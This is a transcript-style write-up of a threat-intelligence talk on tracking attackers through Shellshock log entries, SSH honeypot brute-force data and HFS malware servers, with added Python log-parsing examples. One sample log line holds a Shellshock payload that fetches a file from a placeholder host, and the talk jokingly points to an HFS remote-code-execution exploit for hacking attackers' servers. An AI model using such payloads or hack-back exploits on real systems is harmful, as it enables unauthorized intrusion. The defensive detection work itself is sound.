No Budget Threat Intelligence 3: Discovery and Investigation

Andrew Morris makes some great points about the vulnerabilities most commonly used by remote attackers on the Internet; read this part to learn what those are.

Discovery & Investigation

Shellshock is still in vogue

We are now going to talk about discovery and investigation. Bad guys are still using Shellshock to propagate pretty heavily on the Internet. You are still going to see a good bit of that. It’s still working, there’s still a bunch of stuff that’s unpatched for that, believe it or not. If you want to start no budget threat intel tracking bad guys that are propagating with Shellshock, just look at all of your Apache logs and ‘grep’ for the standard Shellshock characters that you are going to see in Shellshock requests, the standard things like that, which is right here (see right-hand image). I discovered a couple of groups that are still propagating with Shellshock, with a lot of boxes that they are using: one group in Russia, one group in the Netherlands.
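The Apache log check described above, as an added example that is not part of the original talk: it scans constructed combined-format log lines for the Shellshock function-definition trigger in any quoted field, pulls out the command the attacker appended, and counts trigger lines per source so the propagation boxes stand out.

```python
import re
from collections import Counter

# Constructed sample lines in Apache combined log format (not real traffic).
# 203.0.113.7 sends the Shellshock trigger in the User-Agent and then in the Referer.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [10/Oct/2015:13:55:36 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 612 "-" "() { :;}; /bin/bash -c 'wget http://example.invalid/x -O /tmp/x'"
198.51.100.9 - - [10/Oct/2015:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2015:13:56:01 +0000] "GET /cgi-bin/status HTTP/1.1" 404 0 "() { :; }; echo vulnerable" "curl/7.35.0"
"""

# The Shellshock trigger: an empty function definition "() { ...; }" followed by ";" and a trailing command.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
# Quoted fields of the combined log: request, referer, user-agent (backslash escapes allowed).
QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
FIELD_NAMES = ("request", "referer", "user_agent")


def find_shellshock(log_text):
    """Return one record per log line carrying a Shellshock trigger in any quoted field."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip = line.split(" ", 1)[0]
        fields = QUOTED_RE.findall(line)
        for name, value in zip(FIELD_NAMES, fields):
            m = SHELLSHOCK_RE.search(value)
            if m:
                # Everything after the closing "};" is the command the attacker wants executed.
                hits.append({"ip": ip, "field": name, "command": value[m.end():].strip(), "line": line})
                break  # one record per line is enough for tracking sources
    return hits


def sources(hits):
    """Count trigger lines per source IP; the noisy ones are the propagation boxes to track."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = find_shellshock(SAMPLE_ACCESS_LOG)
    for h in found:
        print(h["ip"], h["field"], "->", h["command"])
    print(sources(found).most_common())
```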

Crazy amount of authentication attempts

But mostly, the stuff that I look at is SSH, because it’s super-common on the Internet. There’s a lot of SSH that’s facing the Internet. There’s a lot of SSH that’s configured poorly, a lot of really bad credentials that are being used. So it’s a number one kind of trace for bad guys to use. Bad guys try lots and lots of passwords on the Internet. There’s a group in Hong Kong – I was actually just talking about them earlier – that I’ve seen over 100,000 authentication attempts per box per day from them. They’ll literally just sit there and just try to authenticate with everything. And this is the range that they are coming from (see left-hand image).

If you ever feel like checking your SSH logs or anything like that, I guarantee you 100% you’re going to have authentication attempts from them. And the thing is, you’ll look at the passwords that they try, and they do “password 1” and then “Password 1”. They do that stuff, but they actually try some really-really advanced crazy passwords that I’m pretty sure have come from password dumps from elsewhere, or they just are actually banking on doing brute-force attacks that are real, actual brute-force attacks. They are just going to keep on doing it forever.

You don’t really see actual operators too often log into Kippo instances.

Usually the stuff behind the SSH people is just automated scripts. You don’t really see actual operators too often log into Kippo instances. It’s usually something to log in, run an automated “uname -a”, wget a piece of malware based on the output of that, and then it will execute it or whatever. But you do still get actual operators because, obviously, that’s not going to work all the time, and so sometimes you’ll see an actual person, a human being, that logs in and actually checks “Oh, what’s going on here?”

Popular passwords that bad guys try

Again, a lot of really cool SSH data – these are the passwords that people actually have been trying (see right-hand image). I’ve seen around 24,000 instances of people trying “root” as the password and so on and so forth.

SSH library versions used by the Hong Kong cybercriminal group

There’s a bunch of SSH library versions that people use as well (see left-hand image). The most common is SSH-2.0-PuTTY. That’s kind of a weird statistic here just because that is actually just what the Hong Kong group that I’ve been talking about uses. It’s not actual PuTTY, it’s just whatever they configured the brute-forcer that they wrote to use as the banner. You can think of it kind of like a user agent. A funny thing about this is you’ll see the names of hacking tools in the library versions. It will be, like, SSH-2.0_Medusa. Well, that’s definitely not a regular remote administration tool.
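The SSH honeypot statistics from the last three sections (attempts per box per day, passwords tried, client banners, and banners that name a brute-force tool such as Medusa), as an added example that is not part of the original talk. The sample lines are constructed in the style of Kippo’s log output; the exact line layout is an assumption of this example, so adjust the two regexes to whatever your honeypot writes.

```python
import re
from collections import Counter

# Constructed sample lines in the style of Kippo's log output (not a real capture;
# the line layout is an assumption of this example, adjust the regexes to your own logs).
SAMPLE_KIPPO_LOG = """\
2015-10-10 02:00:01+0000 [HoneyPotTransport,1,203.0.113.7] Remote SSH version: SSH-2.0-PuTTY
2015-10-10 02:00:02+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/root] failed
2015-10-10 02:00:03+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [root/password1] failed
2015-10-10 02:00:04+0000 [HoneyPotTransport,2,203.0.113.7] Remote SSH version: SSH-2.0-PuTTY
2015-10-10 02:00:05+0000 [SSHService ssh-userauth on HoneyPotTransport,2,203.0.113.7] login attempt [admin/root] failed
2015-10-10 02:00:06+0000 [HoneyPotTransport,3,198.51.100.9] Remote SSH version: SSH-2.0-Medusa
2015-10-10 02:00:07+0000 [SSHService ssh-userauth on HoneyPotTransport,3,198.51.100.9] login attempt [root/123456] failed
2015-10-10 02:00:08+0000 [HoneyPotTransport,4,192.0.2.5] Remote SSH version: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
2015-10-10 02:00:09+0000 [SSHService ssh-userauth on HoneyPotTransport,4,192.0.2.5] login attempt [root/toor] succeeded
"""

VERSION_RE = re.compile(r"HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] Remote SSH version: (?P<banner>\S.*)$")
LOGIN_RE = re.compile(r"HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] login attempt "
                      r"\[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>failed|succeeded)")
# Banner substrings that name a brute-force tool rather than a real client; Medusa is the one the
# talk cites, extend the tuple with whatever shows up in your own data.
TOOL_MARKERS = ("medusa",)


def summarize(log_text):
    """Tally attempts per (source, day), passwords tried, client banners, tool banners and successes."""
    per_ip_day, passwords, banners = Counter(), Counter(), Counter()
    tool_sources, successes = set(), []
    for line in log_text.splitlines():
        day = line[:10]  # ISO date prefix of the timestamp
        m = VERSION_RE.search(line)
        if m:
            banners[m["banner"]] += 1
            if any(t in m["banner"].lower() for t in TOOL_MARKERS):
                tool_sources.add(m["ip"])
            continue
        m = LOGIN_RE.search(line)
        if m:
            per_ip_day[(m["ip"], day)] += 1
            passwords[m["pw"]] += 1
            if m["result"] == "succeeded":
                successes.append((m["ip"], m["user"], m["pw"]))
    return {"per_ip_day": per_ip_day, "passwords": passwords, "banners": banners,
            "tool_sources": tool_sources, "successes": successes}


def noisiest_sources(summary, threshold):
    """(ip, day, count) for sources at or above `threshold` attempts in one day, busiest first."""
    rows = [(ip, day, n) for (ip, day), n in summary["per_ip_day"].items() if n >= threshold]
    return sorted(rows, key=lambda r: -r[2])
```

Run `summarize(SAMPLE_KIPPO_LOG)` and feed the result to `noisiest_sources` with a threshold suited to your box; the same summary gives `passwords.most_common()` and `banners.most_common()` for the two charts from the talk.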

SSH gotchas

A couple of SSH gotchas (see right-hand image). Bad guys love using SFTP, and Kippo doesn’t include SFTP by default. So, if they try to negotiate an SFTP session or whatever, it’s going to fail by default. But some guy who’s a lot smarter than me wrote an SFTP patch. You can incorporate that into your honeypots, and you will get so much more malware when you do that. A lot of people log in to do ‘wget’, but bad guys are going to want to just do it in line with SFTP. So I actually forked over a version of Kippo. I added an SFTP patch, an option to disable this weird fake jail that Kippo does, which I hate. I added some more default creds and I got rid of the port 80 ‘wget’ limitation that Kippo has by default. And the reason the developer put a limitation on Kippo was because he didn’t want people using Kippo instances as port scanners, but I don’t care, I’d rather get more malware.

HFS example

You are going to see a lot of this (see right-hand image) when you start doing this. You are going to see a ton of these HFS web servers when you start looking at attacks like this. They are all in Chinese, of course. And you are going to see the filename, the size of the file in here, the date uploaded, and the amount of downloads, which is important because that can let you track how big a botnet may be. If you see that something was uploaded three days ago and you see that it’s got 9,000 downloads, then you can usually say, okay, these people probably have 8,000-9,000 bots sitting on their thing – just from this as the source.

HFS heavily exploited

And you are going to see a ton of these (see left-hand image). I mean, they are everywhere. This one version in particular – bad guys just love this stuff. I don’t know why. It literally does the same thing as Apache. It has directory listing enabled by default, so if there’s one sample or ten samples, you can get all of them just as a result of getting access or seeing the path of one.

No budget techniques

So, some no budget tactics for this kind of stuff (see right-hand image). You can Google dork for these web servers. Google is weird about indexing things that aren’t on port 80, though, so that’s a little bit difficult. Intext:“httpfileserver” – you can look for that. If you feel like grotesquely violating the Computer Fraud and Abuse Act, HFS is vulnerable to a really bad RCE bug, and no one ever uses the updated version. So, if you do feel like getting criminal and executing code on their boxes or whatever – you can, there’s an exploit for it, it works.

Read previous: No Budget Threat Intelligence 2: Setting up Cheap Honeypots

Read next: No Budget Threat Intelligence 4: Reversing Malware Samples